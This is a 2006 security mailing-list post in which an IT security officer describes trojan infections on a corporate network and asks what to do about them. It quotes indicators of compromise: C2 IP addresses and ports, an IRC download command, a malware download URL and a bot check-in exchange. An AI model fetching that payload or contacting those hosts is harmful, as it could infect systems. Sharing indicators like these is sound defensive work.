Security Incidents mailing list archives
Malware/trojan attacks
From: "Goetz, Richard" <RGoetz () Kronos com>
Date: Tue, 24 Oct 2006 10:53:52 -0400
Over the last several months we have on more than one occasion uncovered a number of Trojans that appear to be seeking corporate information, sending that over a chat session to/through several European sites and downloading additional programs to the infected computer. Here's a short synopsis of the type of conversations one of our people uncovered on a laptop on the network: Contacts 203.121.73.136 on port TCP/17555. IRC commands were sent to the workstation to run a command "staticftp" 70.84.109.84 to download a program x.exe. Instructed to launch 5 scans (netapi on port 137, wkssvc port 445, asn on port 445, dcom on port 135 and lsass on port 445). Connects to 66.36.243.116 on TCP/80 and starts a PHP-based conversation, giving the workstation credentials to the host and receiving the following information: CARGO:smtp_purple; MOD:smtp; PATH:http://niuqennaois.com/s2.5.exe; SERVER:209.160.64.216; REFRESH:2700;KEY:864a1bae77fc8053055d02550ed7b49c; Connects to 195.49.141.23 on TCP/3144, retrieving unreadable data Connects to 66.36.243.116 on TCP/80, exchanging credentials via PHP: To host: uuid <wsname>_547611528 wv mag5_min0_build2195_Service_Pack_4 cargo check purple To workstation: REFRESH:3600; KEY: 864a1bae77fc8053055d02550ed7b49c; HTTP connections are made to 66.45.232.66, 66.36.243.116 to perform similar PHP and download conversations. Three way TCP handshakes are attempted to 74.52.53.66, 68.142.212.41and 68.142.212.93 on TCP/80, but no further conversation was made. My questions are: 1. Are other folks in the community seeing this kind of activity? 2. What, aside from deleting what you can find what other actions are recommended/required? Who, if anyone, in the community or law enforcement should be notified? If this post should be somewhere else, please let me know. Thanks, Richard Goetz IT Security Officer Kronos, Incorporated Phone: 978-947-2819 Fax: 978-256-3919 RGoetz () Kronos com Experts at Improving the Performance of People and Business ------------------------------------------------------------------------------ This List Sponsored by: Black Hat Attend the Black Hat Briefings & Training USA, July 29-August 3 in Las Vegas. World renowned security experts reveal tomorrow's threats today. Free of vendor pitches, the Briefings are designed to be pragmatic regardless of your security environment. Featuring 36 hands-on training courses and 10 conference tracks, networking opportunities with over 2,500 delegates from 40+ nations. http://www.blackhat.com ------------------------------------------------------------------------------
Current thread:
- Malware/trojan attacks Goetz, Richard (Oct 24)
- RE: Malware/trojan attacks lucretias (Oct 26)
- RE: Malware/trojan attacks Harlan Carvey (Oct 26)
- RE: Malware/trojan attacks lucretias (Oct 26)
- RE: Malware/trojan attacks Harlan Carvey (Oct 26)
- <Possible follow-ups>
- Re: Malware/trojan attacks krokofish (Oct 25)
- RE: Malware/trojan attacks lucretias (Oct 26)